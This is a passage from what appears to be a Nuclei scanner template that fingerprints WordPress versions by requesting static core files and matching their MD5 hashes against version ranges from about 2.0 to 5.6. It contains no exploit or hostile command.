"{{BaseURL}}/wp-includes/js/codemirror/htmlhint.js" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"b532ec7cd19faf478c4d740b5035a7ea\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/codemirror.min.css" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"a632336ab79ded318dc02844c4faf3b5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/jshint.js" - matchers: - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"fa622859a12fe91067429a01c8158a04\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"9d84f61dfb50fa0321ec52716301cdca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/jsonlint.js" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"49296679dee36b0c548c2bcaed3cd59f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/codemirror.min.js" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"f2d20913fc0766828268883b66af71ec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/htmlhint-kses.js" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"eefd81f25baeb66b5bf323634c667b1b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"5c509ea150c4abff1c5a288de7299c41\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"7e86c1cecc74753dcc8b63784c0815a3\" == md5(body))" - - type: dsl - name: 4.1 - 4.7.3 - dsl: - - "(\"1581bb02286f54b4fb0cce52d2ef61c7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"6956d77a2747ec8129e0c6f7bcfb1ced\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.6 - dsl: - - "(\"cdb6a59abe551818e8a3a6d61b68e00e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/hr/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"a0a566612a12ce9069e89054bf2559b3\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"831204a97da9fa6b6784885a930a2743\" == md5(body))" - - type: dsl - name: 4.1 - 4.7.3 - dsl: - - "(\"5c23255ad2d11db3f72c33b649f1389a\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"dda52a147fa87063ac5b78dae4d8afa4\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.6 - dsl: - - "(\"0911253e82299afa85c2950c033bb68f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/charmap/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"e21c5873be5aa8407266377225b67c26\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"318a17ced489d313fa5d74038ef540a0\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"bc5a8cc213bb3fe51b5673b64dd9d408\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"4c25dd1c151e1a2e3b196e8371404f03\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3231e7edd451f1950c2a856e68950399\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"218b586940473a3d64d408b22fa603ae\" == md5(body))" - - type: dsl - name: 4.2 - 4.3 - dsl: - - "(\"aeb8638d01b2c3c7fbf36e69893f4b25\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ac627e9017143d091eb11ab6cf1ee68b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"59afca0b460ebb487e2717c2df92cf96\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"35657b2be541481d479c3fb22192f2b1\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.6 - dsl: - - "(\"3d42b6ec9f848bb610500d4cf6e2a00c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"451c40101c1a2f619c2d7dd4d6d0981f\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"3834eac105922686e034799a66a771cb\" == md5(body))" - - type: dsl - name: 3.9 - 4.7.3 - dsl: - - "(\"5798e3d2fb0180a9179b8bd7cf728eae\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.6 - dsl: - - "(\"4c927b02ec9bc57017eab8d7b6dcd2a0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"6e485d9790488dcaf9f3f00dcf63f856\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"78302f1959b7a828bba2949c70ffe5f9\" == md5(body))" - - type: dsl - name: 4.1 - 4.7.3 - dsl: - - "(\"60de57253ca9143a6f1e4aff10fc39d2\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"241cedb5e02850e752c919a2cdc4153e\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.6 - dsl: - - "(\"884572e84844add444b1c133a61f9a40\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/utils/validate.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"23a879a6f9b566ddb32810a3bcbd00e5\" == md5(body))" - - type: dsl - name: 4.3 - 4.7.19 - dsl: - - "(\"c42b5160bdbefd1293d76b30520757f4\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"681466e5980a5b99d9baeded56c67d34\" == md5(body))" - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"2d73c0757ea622f65738ea71433ca8e4\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"bc074582820655b7a729e7f92a206b66\" == md5(body))" - - type: dsl - name: 2.6 - 3.0.6 - dsl: - - "(\"6fc5abb84e8ba8ba87b12ad6806f48d1\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"5e365dba77123f9e7946af32055d2870\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"dcbd63050e6909b44e0d0c843ab5ff32\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"6ec1ea2ca3aed0b4b0e36fc9ac48db5a\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"3b909b4fa79d9e7e388561b097d13499\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.6 - dsl: - - "(\"434cc20c313f6f2b033b84f8fb7b5986\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/spinner-2x.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"5c1371bcb4392968647852a9c9df5d6c\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"20ab276845ebcd6cfbf170fb82e8caf1\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"de8c334862726c0a51cc0b3664b60035\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"31fd991e90e6329d865e23e638b50ff4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/spinner.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"b0a3dde331637e27aa6476d476481871\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"239a4f2d29907ca59c723e81c102e86c\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"0e12da48af1dbb4379e55c76dcb4f58d\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"d54cf50a44bd0aca6fd98bd46acbb2ba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/resize.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"3fba1544df24f40dde5876c8c0aec461\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"897e92e82f6bc223783659c9237f40b6\" == md5(body))" - - type: dsl - name: 2.7 - 3.8.35 - dsl: - - "(\"68a8e57741df1a16444713a11d7c5b82\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"cbd61f6c4eed10fb1317038905abc4cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/resize-2x.gif" - matchers: - - type: dsl - name: 3.9 - 4.9.16 - dsl: - - "(\"f5e118653f892606682ee9c51d0aba99\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"83e904eb31b68fa48cfdbcaa64ef2966\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"887b335656b4ed4656ac1c1966e4254b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/resize-rtl.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"db9217196313c95a59d43601da19c51d\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"d982b0845bb1b67b2b2db7dd805c8737\" == md5(body))" - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"ddaa579f547c7877730ae2a599a0a0df\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"6e43258f59d8669c88f876b5462e0e7a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/spinner-2x.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"5c1371bcb4392968647852a9c9df5d6c\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"20ab276845ebcd6cfbf170fb82e8caf1\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"de8c334862726c0a51cc0b3664b60035\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"31fd991e90e6329d865e23e638b50ff4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/resize-rtl-2x.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"f7c99ee74014fe92541012303aaadc7d\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"39a1182eec9c2d959f6cc0a145a55b9a\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"fcd61114e538d359a80d419d6554f55e\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"cf154dd5ef93f9a84df148f521fe5941\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/spinner.gif" - matchers: - - type: dsl - name: 4.1 - 4.9.16 - dsl: - - "(\"b0a3dde331637e27aa6476d476481871\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"239a4f2d29907ca59c723e81c102e86c\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"0e12da48af1dbb4379e55c76dcb4f58d\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"d54cf50a44bd0aca6fd98bd46acbb2ba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/l10n-rtl.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"395ebbb01f0499dc79323d9e46bf99c9\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"15e9d8008259ea9efd13495d1b0fa110\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"db1efc9ef2967c05b500794a813de4c2\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"c14f53b547661c4be7bd9a8e38dcdb5d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/l10n.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"55d6b57d8020d981dd12e3308c6d326e\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"48226e1fae8c43c0c82c1995a8555c40\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"6fa315b18e9016357bc9f8c1b32524f5\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"2b2ed5045b480dcfac2e6babbd2f2007\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/code-editor-rtl.min.css" - matchers: - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"7637efd464f4dc9069c33f7833335917\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"ec293f73d213bb45f413489b1be4ddd1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/code-editor.min.css" - matchers: - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"72c3a5be39a933d8763bdd8f10b3e69a\" == md5(body))" - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"4f2bbc906ad777689f33ed3a8e11de4e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js" - matchers: - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"b32d5cea64b4fd156f47c0ec0a9d8532\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-fetch.js" - matchers: - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"456c02ee2a496580a24e5aee614ba9b3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js" - matchers: - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"89a4e64830ce633b60f1e4060faa5726\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js" - matchers: - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"8e8cdd77e6e80407255b55c41dc533a6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js" - matchers: - - type: dsl - name: 5.0 - 5.6 - dsl: - - "(\"3c6accf0039920bf3c59748c23f4261d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/esprima.js" - matchers: - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"645f991220db5392f167abb9d99bb493\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/fakejshint.js" - matchers: - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"35c876f72c524f6c78065d4a27294b1b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/underscore.js" - matchers: - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"f893e294cde60c2462cb19b35aac431b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/colorpicker/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"543f57b60e1bb0ccc7234008d2e0ba1d\" == md5(body))" - - type: dsl - name: 4.3 - 4.7.19 - dsl: - - "(\"22538c49f524050bd8300b44526abc2a\" == md5(body))" - - type: dsl - name: 4.0 - 4.2.29 - dsl: - - "(\"66ed7befbb2773566ed188e1d3b97cc4\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"783a6e647e90523f40158eec5a12f999\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"fc025b0a68f5ac5cfb7af7d9aebbeaf2\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"1f2043b8c3c8ad3f64847bd7ad568581\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"b8176b7448cc4a20744ca6c5e88e4c41\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"e10227de7811e15dc17a31abf79b9338\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.7.3 - dsl: - - "(\"68c99b9ceacf91b4e3c3b471ba349cf2\" == md5(body))" - - type: dsl - name: 4.2 - 4.5 - dsl: - - "(\"a5ca0a92e1bdf1fbf3f9a07db5573092\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"870511532b062a500c95ae81e1cf23d3\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"d02999f00764899d370b2eb1a56a5f95\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"9ee18d31f9106a72a4ce6232064be838\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"a8755e1442ead9a4d91bb150338cf406\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"d5da6dc53df2bff42ff9155d426a1794\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"c4dc76993c68e4e4e8f0ceeeff70fc0b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/textcolor/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"484993eb38dba1019988702c7c8021a6\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.7.19 - dsl: - - "(\"5272a99516c467771ef3076422beb18f\" == md5(body))" - - type: dsl - name: 4.3 - 4.5 - dsl: - - "(\"ff76dd12efde3c20a321d00058535b3f\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f6f2de940de4a60ee25d7cff7a0ceab3\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"1149b1a1442a543492ba931ff0b66ad5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"78ddcc09dafb8cda5e889bbc78905ed4\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"ecdce896b4d8a990f3e4cd5dba46e4c0\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"03c6de7649cd96f85b56ff3e3e02e6be\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"02dc2569a033c9e1d6c966e4e8fbdade\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/hr/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"a3b1b0b468820d74eaff4f341cf797f8\" == md5(body))" - - type: dsl - name: 4.3 - 4.7.19 - dsl: - - "(\"428c9fb47a7b83fa0440a15886d0b11a\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"b4853cda3c7b4c55371939381cecdb86\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"22137a5439e008cf130d8a0c8e335795\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"fd7ae993f8817e35a0caabd6c0744ac0\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"a40ec96b2b25c1356c33e6c1212db9b3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"0bc0eefce537ac2df5bed92c13badf2b\" == md5(body))" - - type: dsl - name: 4.3 - 4.7.19 - dsl: - - "(\"5f21385b1f4513568d611d595040d141\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"2a8fc756a0859acaac1b9d20481979f5\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"c7be1a485e0a213bbb979352c97e497a\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"90a8e01e559f995cb8eb526a8d97e8c5\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"2601d622e85809262029c6cf3dca8024\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/zxcvbn-async.js" - matchers: - - type: dsl - name: 3.8 - 5.0.11 - dsl: - - "(\"97a79e96a815b200139356055d752333\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"21a0938b5ced5349b5071d0c9bfe6923\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"133d902461d45b5a46295e0a9f13f17e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/hoverIntent.js" - matchers: - - type: dsl - name: 4.2 - 5.0.11 - dsl: - - "(\"cab3598b438a9e63984f1c6e9dd79b01\" == md5(body))" - - type: dsl - name: 3.6 - 4.1.32 - dsl: - - "(\"4502421f188ad9e38079741edc36e118\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"73e23cc2a686c50a9f80746d5fde8eb5\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"e7b615fa36594e4ba18d0b71ca0b39c8\" == md5(body))" - - type: dsl - name: 2.8 - 3.3.3 - dsl: - - "(\"1fb2abfd1de9863aa4fb38e4c5dd8ac3\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"d0d5fed467b2ac6c1b79e88ec7a8b514\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"c0d37a2f50f79db4eaaeb10c3c170990\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wpdialog.js" - matchers: - - type: dsl - name: 3.9 - 5.0.11 - dsl: - - "(\"72e8395fd44d4039009c5396888fa6ba\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"c6b779020a09eebd206570dcd4a90666\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-list-revisions.js" - matchers: - - type: dsl - name: 3.8 - 5.0.11 - dsl: - - "(\"47510d7560d22a974c8c0eec6e24bcbd\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"10b8adab39fa790c52bac5c59cead9a8\" == md5(body))" - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"a539afdba6c8cc71a580347083eee7d1\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"5019624f50b503784fa5727337a9b532\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/language-chooser.js" - matchers: - - type: dsl - name: 4.0 - 5.0.11 - dsl: - - "(\"09e20150c7561d0330d7158f744abb4a\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"bc08d5fe72ba491b870cbb590ff93a88\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/user-suggest.js" - matchers: - - type: dsl - name: 3.9 - 5.0.11 - dsl: - - "(\"1e33290807fa8b2829ddb0347d0a9305\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"6d5e23d3e9c18375703c379fe2eeb0ed\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a475074c6a346983f461e0ee48269edb\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"846c3cc0ede47e280f7ed75066394d36\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"b9a41a61b44bc13d90f8861d6cb273b3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/wp-fullscreen-stub.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"968528cb325471eb001fd8578a8625e5\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"0cc3913290e7f2383692254f9a03c586\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"a06bba3593bca1f919fbb48fda7a24cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/deprecated-media.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"2257f52a92d7817195c7ea9659345ec0\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"4073bd9326592a74f14d1eb051d246a4\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"0ada8c65bb367cab1cabc0defa1ac6a6\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"afb8e2f834d79d6e4735f1e96adbef5f\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d729315fbe131ad6b6fed3c6fb27af69\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"eb2ea5040c616ab1da534bfa6940d877\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"bb1687b14f439591b839d9bbbb834166\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff" - matchers: - - type: dsl - name: 4.7.4 - 4.9.5 - dsl: - - "(\"a7a41ea9358b658ec53e9d042334c1a8\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"6b0c3754b1cd1f90566e174098fae8f8\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"5acd099f84c92a932b0e2897f49be665\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"90a61cfad08585040f6bebe2234d8aae\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"04e761d506e64836afab5d2550a3b8df\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"9267f79bc730290c6e2c90f9353d3ccf\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"50c955d592e8a54a0e4cb4936d386076\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg" - matchers: - - type: dsl - name: 4.7.4 - 4.9.5 - dsl: - - "(\"7262d908f15434ec7c3ae2126bc87350\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"ede808f6f04604681b25f843069de379\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"006a3d1ce8aad3f9d3d6a9c3f6129a36\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"0d83661ec506e1571bee29a7cba9e2c2\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"f38d04d3a3cf83c12435370fd77c997d\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"b84225c5a236c3f6cc1aded9afcf48dd\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"d031f47facf4331979b6f9fbac3187ef\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot" - matchers: - - type: dsl - name: 4.7.4 - 4.9.5 - dsl: - - "(\"6196b6eb25b52ac8bbe4a94e6da8ae27\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"240310067afb33df60639d7fd1fa132e\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"a4e6a52223e2edbd1bc2b621ec7c08c3\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"50b8dc1736855fc2b8d71d669b0eabf7\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"248f6caf6179ea6c4035b7eaec7edd6e\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"6401227790b9e544ef6b8d749cd0a358\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"06189313e1c7504e1edaa12766c2cfd9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf" - matchers: - - type: dsl - name: 4.7.4 - 4.9.5 - dsl: - - "(\"aefbfcb02f143d3b3d3e47ff3de8efb1\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"1fb250c3b9bc34fd53cd883070e3dffd\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"20eaff7be8a4f2cde874a39a898155c4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"04f99db6f827ff1f7c68d6bc6b38ca99\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"d2673bd2dd98e5359b733f57ee3c4778\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"f8d2925604a55d7b8604a9875b8e70d3\" == md5(body))" - - type: dsl - name: 5.1 - 